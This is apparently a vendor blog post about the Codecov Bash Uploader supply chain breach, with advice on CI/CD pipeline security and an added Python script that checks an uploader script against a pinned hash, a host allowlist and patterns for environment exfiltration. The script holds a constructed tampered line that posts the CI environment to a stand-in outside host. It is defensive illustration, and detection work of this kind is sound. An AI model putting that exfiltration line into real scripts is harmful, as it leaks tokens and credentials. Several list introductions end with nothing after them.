Apr 16 · 4 min read
A new “double” software supply chain attack that compromised Codecov Bash Uploader was revealed to have gone undetected since January and exposed sensitive secrets like tokens, keys and credentials from various organizations around the world.
As reported by SecurityWeek on April 15, the attack occurred four months ago but was only discovered by a Codecov customer on April 1, 2021, the company said in a note acknowledging the severity of the breach. According to the company, the breach allowed the attackers to export information stored in its users’ continuous integration (CI) pipeline environments, which was then sent to a third-party server outside of Codecov’s infrastructure.
The breach allowed a malicious third party to alter a version of the Bash Uploader script so that it could export information from continuous integration (CI) environments to a third-party server, which, according to Codecov, could potentially affect:
In response, organizations need to take proactive action to secure their supply chain from such attacks. This requires a conscious approach to CI/CD security posture that takes into account the sophisticated nature of today’s attacks.
Organizations need to watch their configuration files closely. Whenever any change is made to a config file, this change needs to be checked for any possible privilege escalation, or suspicious access. Config files are central to the operations of a software supply chain and should not be overlooked. Any suspicion should trigger notifications and alerts to the appropriate stakeholders, and stop certain tasks until it’s verified to be safe. This automation, being immediate, can act as a strong defense against attacks, as it’s significantly faster than manual human intervention.
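As an added example (not Codecov’s or Argon’s code), here is a pre-flight check of the kind described above, applied to the artifact that was altered in this incident, a fetched uploader script: it verifies the script against a pinned SHA-256, flags any outbound host not on an allowlist, and halts the job when the process environment is expanded into a network request. The pinned script body, the allowlisted host and the tampered sample are all constructed for illustration.

```python
"""Pre-flight integrity check for a CI uploader script.

Added example, not Codecov's or Argon's code. The pinned script body, the
allowlisted host and the tampered sample below are constructed for
illustration; in a real pipeline the pinned hash comes from your own review.
"""
import hashlib
import re

# Constructed: the uploader script body you reviewed and pinned.
KNOWN_GOOD_SCRIPT = (
    b"#!/bin/bash\n"
    b"curl -s https://codecov.example/upload -F report=@coverage.xml\n"
)
PINNED_SHA256 = hashlib.sha256(KNOWN_GOOD_SCRIPT).hexdigest()
ALLOWED_HOSTS = {"codecov.example"}  # constructed allowlist

# Constructed: the same script with one line added that posts the CI
# environment (tokens, keys, credentials) to a host outside the allowlist.
TAMPERED_SCRIPT = KNOWN_GOOD_SCRIPT + (
    b'curl -s -d "$(env)" https://collector.invalid/ || true\n'
)

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
ENV_SUBST_RE = re.compile(r"\$\((env|printenv)\b")
NET_TOOL_RE = re.compile(r"\b(curl|wget)\b")


def check_script(script: bytes) -> dict:
    """Return 'ok' or 'halt' plus the reasons that should raise an alert."""
    reasons = []
    digest = hashlib.sha256(script).hexdigest()
    if digest != PINNED_SHA256:
        reasons.append(f"hash mismatch: got {digest[:12]}..., pinned {PINNED_SHA256[:12]}...")
    text = script.decode("utf-8", errors="replace")
    for host in HOST_RE.findall(text):
        if host not in ALLOWED_HOSTS:
            reasons.append(f"unexpected outbound host: {host}")
    for lineno, line in enumerate(text.splitlines(), 1):
        # A line that both invokes a network client and expands the process
        # environment is the shape of the exfiltration the article describes.
        if NET_TOOL_RE.search(line) and ENV_SUBST_RE.search(line):
            reasons.append(f"line {lineno}: environment expanded into a network request")
    return {"verdict": "halt" if reasons else "ok", "sha256": digest, "reasons": reasons}


if __name__ == "__main__":
    for name, body in (("pinned", KNOWN_GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        result = check_script(body)
        print(name, result["verdict"], *result["reasons"], sep="\n  ")
```

Run it as a gated step before the uploader executes: a "halt" verdict should fail the job and page the owners of the pipeline rather than let the script run.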
Here are 3 actionable things you can do to secure your software supply chain starting tomorrow:
Running CI/CD pipelines without a strong security posture opens your organization to severe cyber risks
The last thing any organization wants is to be in the news for the wrong reasons – a security attack or data breach. This breaks customer trust, costs businesses real revenue, and leaves lingering damage for months or even years. The better alternative is to determine and implement actions that secure your CI/CD pipeline, which will help you keep supply chain attacks (and the long-lasting damage they cause) far away from your organization.
Argon can help you gain the visibility and control you need over your CI/CD pipeline to mitigate such supply chain risks. Argon CI/CD pipeline security will help you:
Eran Orzel, Argon’s Chief Revenue Officer